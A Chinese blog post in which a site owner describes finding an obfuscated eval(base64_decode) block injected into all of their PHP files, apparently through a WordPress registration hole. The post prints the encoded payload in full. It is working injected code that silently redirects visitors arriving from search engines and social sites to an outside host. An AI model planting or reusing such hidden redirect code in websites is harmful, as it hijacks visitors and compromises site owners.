本站被注册了漏洞eval(base64_decode控制代码,已恢复

本站被

注入漏洞eval(base64_decode 感染了,查看FTP,发现在昨晚所有PHP文件都被插入了

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudC
gpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1Y
Wc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0ci
gkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cml
zdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cml
zdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNv
bSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcm
VyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHBy
ZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZ
WZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkc
mVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc
3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvb
C5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3Ry
KCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9vbm90aXcuZG5z
ZXQuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));
image
就懒得去破解这加密的文件了!直接恢复站点算了,这应该是wordpress的漏洞来的,赶紧更新程序,把注册用户关了!应该是被新注册的用户注入代码的!
由于手快快,把空间都删了,才发现没备份好~还好空间商帮忙把\wp-content\uploads 目录恢复了,不然那些图片就惨了,这空间用了快两年了,
卖家很好人,总比以前买的香港垃圾主机强多了!~给好人打个广告吧,旺旺:xxxxgg

chaping

我还没有学会写个人说明!

相关推荐

三丰云-全是坑

前言 今天整理微信收藏夹时,发现有收藏了一个好友小黑分享过的链接,时间是2020年8月份的,时间太久,不记得是什么了,打开 ...

暂无评论

发表评论

您的电子邮件地址不会被公开,必填项已用*标注。